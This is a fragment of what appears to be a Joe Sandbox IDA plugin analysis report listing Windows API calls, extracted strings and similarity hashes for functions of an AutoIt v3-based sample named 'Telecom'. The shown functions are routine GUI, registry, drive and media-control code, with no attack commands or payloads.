                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4d60258dec321d04381de5cc7dcacf7d06bad2cbc58ebb1dbe5c2253c1ca63bc
                                                      • Instruction ID: 743df14961fc680a9cb4867d4a3cc8da65955f687ee09f06f7f05b8c7c3280ed
                                                      • Opcode Fuzzy Hash: 4d60258dec321d04381de5cc7dcacf7d06bad2cbc58ebb1dbe5c2253c1ca63bc
                                                      • Instruction Fuzzy Hash: 0561267120070866DF345A6888A57FF33989B42744F154B1FEA82EB391FE1D9D8B825F
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • DeleteObject.GDI32(00000000), ref: 004C358D
                                                      • DeleteObject.GDI32(00000000), ref: 004C35A0
                                                      • DestroyWindow.USER32 ref: 004C35AF
                                                      • GetDesktopWindow.USER32 ref: 004C35CA
                                                      • GetWindowRect.USER32(00000000), ref: 004C35D1
                                                      • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 004C3700
                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004C370E
                                                      • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004C3755
                                                      • GetClientRect.USER32(00000000,?), ref: 004C3761
                                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 004C379D
                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004C37BF
                                                      • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004C37D2
                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004C37DD
                                                      • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004C37E6
                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004C37F5
                                                      • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004C37FE
                                                      • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004C3805
                                                      • GlobalFree.KERNEL32(00000000), ref: 004C3810
                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004C3822
                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,004E0C04,00000000), ref: 004C3838
                                                      • GlobalFree.KERNEL32(00000000), ref: 004C3848
                                                      • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 004C386E
                                                      • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 004C388D
                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004C38AF
                                                      • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004C3A9C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                      • String ID: $AutoIt v3$DISPLAY$static
                                                      • API String ID: 2211948467-2373415609
                                                      • Opcode ID: 60a6774e02135d462cf7b874b5f9850e3d6c4a92f7d6496b75ce7d59b982f500
                                                      • Instruction ID: 894e50b519ae1bad3504c399efa7d445e52cfc516810221b5f773234b1994bef
                                                      • Opcode Fuzzy Hash: 60a6774e02135d462cf7b874b5f9850e3d6c4a92f7d6496b75ce7d59b982f500
                                                      • Instruction Fuzzy Hash: 6102AF75A00205AFDB14DF64CC89EAE7BB9EB48311F04815EF9159B2A0CB78ED01CF68
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • DestroyWindow.USER32(00000000), ref: 004C319B
                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004C32C7
                                                      • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 004C3306
                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 004C3316
                                                      • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 004C335D
                                                      • GetClientRect.USER32(00000000,?), ref: 004C3369
                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 004C33B2
                                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004C33C1
                                                      • GetStockObject.GDI32(00000011), ref: 004C33D1
                                                      • SelectObject.GDI32(00000000,00000000), ref: 004C33D5
                                                      • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 004C33E5
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004C33EE
                                                      • DeleteDC.GDI32(00000000), ref: 004C33F7
                                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004C3423
                                                      • SendMessageW.USER32(00000030,00000000,00000001), ref: 004C343A
                                                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 004C347A
                                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 004C348E
                                                      • SendMessageW.USER32(00000404,00000001,00000000), ref: 004C349F
                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 004C34D4
                                                      • GetStockObject.GDI32(00000011), ref: 004C34DF
                                                      • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 004C34EA
                                                      • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 004C34F4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                      • API String ID: 2910397461-517079104
                                                      • Opcode ID: 26dcb5483f2027b661379ed952fb0b0e97c926f34fe90a894054400363fe3ea7
                                                      • Instruction ID: 03cbfa8bb904a39d0c1815e452b7e1c7454e6828565f6aab3a5af703e1d28cb6
                                                      • Opcode Fuzzy Hash: 26dcb5483f2027b661379ed952fb0b0e97c926f34fe90a894054400363fe3ea7
                                                      • Instruction Fuzzy Hash: F5B16F75A00215AFEB14DFA8CC45FAE7BB9EB08715F10855AF915E7290C778ED00CBA8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 004B5532
                                                      • GetDriveTypeW.KERNEL32(?,004DDC30,?,\\.\,004DDCD0), ref: 004B560F
                                                      • SetErrorMode.KERNEL32(00000000,004DDC30,?,\\.\,004DDCD0), ref: 004B577B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$DriveType
                                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                      • API String ID: 2907320926-4222207086
                                                      • Opcode ID: 6ac0b41cc56f07a6a0ceef50d15b9faa35f7913a4b3c5fffe5df4a08e7082f3f
                                                      • Instruction ID: fc7443ca9d9ab2076506656cd6ea7c47e42f671b46b5b35608c9394763fe7a36
                                                      • Opcode Fuzzy Hash: 6ac0b41cc56f07a6a0ceef50d15b9faa35f7913a4b3c5fffe5df4a08e7082f3f
                                                      • Instruction Fuzzy Hash: 1461A431B44909DBC724DF24C991AFDF7A1FF18354F24406BE40A9B291DA29AD03DB6A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004425F8
                                                      • GetSystemMetrics.USER32(00000007), ref: 00442600
                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0044262B
                                                      • GetSystemMetrics.USER32(00000008), ref: 00442633
                                                      • GetSystemMetrics.USER32(00000004), ref: 00442658
                                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00442675
                                                      • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00442685
                                                      • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 004426B8
                                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 004426CC
                                                      • GetClientRect.USER32(00000000,000000FF), ref: 004426EA
                                                      • GetStockObject.GDI32(00000011), ref: 00442706
                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00442711
                                                        • Part of subcall function 004419CD: GetCursorPos.USER32(?), ref: 004419E1
                                                        • Part of subcall function 004419CD: ScreenToClient.USER32(00000000,?), ref: 004419FE
                                                        • Part of subcall function 004419CD: GetAsyncKeyState.USER32(00000001), ref: 00441A23
                                                        • Part of subcall function 004419CD: GetAsyncKeyState.USER32(00000002), ref: 00441A3D
                                                      • SetTimer.USER32(00000000,00000000,00000028,0044199C), ref: 00442738
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                      • String ID: <)Q$<)Q$AutoIt v3 GUI$(Q$(Q$(Q
                                                      • API String ID: 1458621304-1599819014
                                                      • Opcode ID: 20ffd11f093b17b064bea0cb2bb8f5f6fd4be748edcad502f5b05205b77b8e13
                                                      • Instruction ID: c045f89548d186ad465a54a3b645928be6624922575061184b822e99ccb8a35e
                                                      • Opcode Fuzzy Hash: 20ffd11f093b17b064bea0cb2bb8f5f6fd4be748edcad502f5b05205b77b8e13
                                                      • Instruction Fuzzy Hash: 3BB1AE71A00209AFDB14EFA8DD45BEE3BB4FB48715F10412AFA05A7290D7B8E941CF59
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?), ref: 004D0D81
                                                      • _wcslen.LIBCMT ref: 004D0DBB
                                                      • _wcslen.LIBCMT ref: 004D0E25
                                                      • _wcslen.LIBCMT ref: 004D0E8D
                                                      • _wcslen.LIBCMT ref: 004D0F11
                                                      • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 004D0F61
                                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 004D0FA0
                                                        • Part of subcall function 0045FD52: _wcslen.LIBCMT ref: 0045FD5D
                                                        • Part of subcall function 004A2B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004A2BA5
                                                        • Part of subcall function 004A2B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 004A2BD7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$MessageSend$BuffCharUpper
                                                      • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                      • API String ID: 1103490817-719923060
                                                      • Opcode ID: a58eb71afbd36457f979fcfd3260ff537eee0083781fd7bc987908e290e93b7c
                                                      • Instruction ID: 60319ed73901e1e9d164597f15c80b62382cb5830281ffda5bb2aea8678edf9e
                                                      • Opcode Fuzzy Hash: a58eb71afbd36457f979fcfd3260ff537eee0083781fd7bc987908e290e93b7c
                                                      • Instruction Fuzzy Hash: 87E1DF312042419FC714DF25C56092AB7E2BF98318F14496FF8969B3A2DB38ED45CB5A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004CCF1D
                                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,004DDCD0,00000000,?,00000000,?,?), ref: 004CCFA4
                                                      • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 004CD004
                                                      • _wcslen.LIBCMT ref: 004CD054
                                                      • _wcslen.LIBCMT ref: 004CD0CF
                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 004CD112
                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 004CD221
                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 004CD2AD
                                                      • RegCloseKey.ADVAPI32(?), ref: 004CD2E1
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 004CD2EE
                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 004CD3C0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                      • API String ID: 9721498-966354055
                                                      • Opcode ID: 165321d39071cd2715cc840e240aa1c6e99fa8b3439eee811047cb052463e8ef
                                                      • Instruction ID: 2f48a179ddde94cc0286fa992095f5a53a094719d488c3019dc2fa019b705962
                                                      • Opcode Fuzzy Hash: 165321d39071cd2715cc840e240aa1c6e99fa8b3439eee811047cb052463e8ef
                                                      • Instruction Fuzzy Hash: D6122B356042019FD754DF15C881F2AB7E5EF88718F14849EF88A9B3A2DB39ED41CB89
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?), ref: 004D1462
                                                      • _wcslen.LIBCMT ref: 004D149D
                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 004D14F0
                                                      • _wcslen.LIBCMT ref: 004D1526
                                                      • _wcslen.LIBCMT ref: 004D15A2
                                                      • _wcslen.LIBCMT ref: 004D161D
                                                        • Part of subcall function 0045FD52: _wcslen.LIBCMT ref: 0045FD5D
                                                        • Part of subcall function 004A3535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004A3547
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$MessageSend$BuffCharUpper
                                                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                      • API String ID: 1103490817-4258414348
                                                      • Opcode ID: 141395c95f38f38a84f22394bfb046c17dbea7f5a21e80e96e5133e9df5e1d2a
                                                      • Instruction ID: 6626ae77e34998beae6501d97ebea957fc11b27a4c00f1aec03e6355ec57c335
                                                      • Opcode Fuzzy Hash: 141395c95f38f38a84f22394bfb046c17dbea7f5a21e80e96e5133e9df5e1d2a
                                                      • Instruction Fuzzy Hash: C4E18175604301AFC714EF25C46086AB7E2FF94314B14495FF8969B3A2DB38ED45CB8A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$BuffCharUpper
                                                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                      • API String ID: 1256254125-909552448
                                                      • Opcode ID: c492dbaf62284bc1c9cae79cb1e9eaa6139e4c602b11be4979efd242b14ec397
                                                      • Instruction ID: 3a6244d3322542345fec60eb42d1ff6b2bb61503aa2c080eee273b90473ad104
                                                      • Opcode Fuzzy Hash: c492dbaf62284bc1c9cae79cb1e9eaa6139e4c602b11be4979efd242b14ec397
                                                      • Instruction Fuzzy Hash: FE71D536E0052A9BCB509E28CD40FBF37A1AF60758B22013FE85697394EA3DDD45C799
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • _wcslen.LIBCMT ref: 004D8DB5
                                                      • _wcslen.LIBCMT ref: 004D8DC9
                                                      • _wcslen.LIBCMT ref: 004D8DEC
                                                      • _wcslen.LIBCMT ref: 004D8E0F
                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 004D8E4D
                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,004D6691), ref: 004D8EA9
                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 004D8EE2
                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 004D8F25
                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 004D8F5C
                                                      • FreeLibrary.KERNEL32(?), ref: 004D8F68
                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 004D8F78
                                                      • DestroyIcon.USER32(?,?,?,?,?,004D6691), ref: 004D8F87
                                                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 004D8FA4
                                                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 004D8FB0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                      • String ID: .dll$.exe$.icl
                                                      • API String ID: 799131459-1154884017
                                                      • Opcode ID: 94374bddc94a67e8bb8f56e67167fcce6e3358fa233588ca7a4b4603205993ff
                                                      • Instruction ID: b203077c0dbcc6c1b54e415ae084b0ea99843e450f61ea241afec3c25352191d
                                                      • Opcode Fuzzy Hash: 94374bddc94a67e8bb8f56e67167fcce6e3358fa233588ca7a4b4603205993ff
                                                      • Instruction Fuzzy Hash: 2D61DE71900219BAEB14DF64CC45BBF77A8BF08B14F10421FF815D62D1EB78A990CBA8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • CharLowerBuffW.USER32(?,?), ref: 004B493D
                                                      • _wcslen.LIBCMT ref: 004B4948
                                                      • _wcslen.LIBCMT ref: 004B499F
                                                      • _wcslen.LIBCMT ref: 004B49DD
                                                      • GetDriveTypeW.KERNEL32(?), ref: 004B4A1B
                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004B4A63
                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004B4A9E
                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004B4ACC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                      • API String ID: 1839972693-4113822522
                                                      • Opcode ID: 571c1c4181a63ab24d19de1204f4f2bd4e4f9c0ac85d541c521b5349cd2dbcd3
                                                      • Instruction ID: 3134b3562dc40798f3f22d2b1f2c7ace8209a27da4ff5100059e867d4a9e920f
                                                      • Opcode Fuzzy Hash: 571c1c4181a63ab24d19de1204f4f2bd4e4f9c0ac85d541c521b5349cd2dbcd3
                                                      • Instruction Fuzzy Hash: FA71BF729082059FD700EF35C8409ABB7E4FF98758F10492EF89597292EB38ED45CBA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • LoadIconW.USER32(00000063), ref: 004A6395
                                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 004A63A7
                                                      • SetWindowTextW.USER32(?,?), ref: 004A63BE
                                                      • GetDlgItem.USER32(?,000003EA), ref: 004A63D3
                                                      • SetWindowTextW.USER32(00000000,?), ref: 004A63D9
                                                      • GetDlgItem.USER32(?,000003E9), ref: 004A63E9
                                                      • SetWindowTextW.USER32(00000000,?), ref: 004A63EF
                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004A6410
                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 004A642A
                                                      • GetWindowRect.USER32(?,?), ref: 004A6433
                                                      • _wcslen.LIBCMT ref: 004A649A
                                                      • SetWindowTextW.USER32(?,?), ref: 004A64D6
                                                      • GetDesktopWindow.USER32 ref: 004A64DC
                                                      • GetWindowRect.USER32(00000000), ref: 004A64E3
                                                      • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 004A653A
                                                      • GetClientRect.USER32(?,?), ref: 004A6547
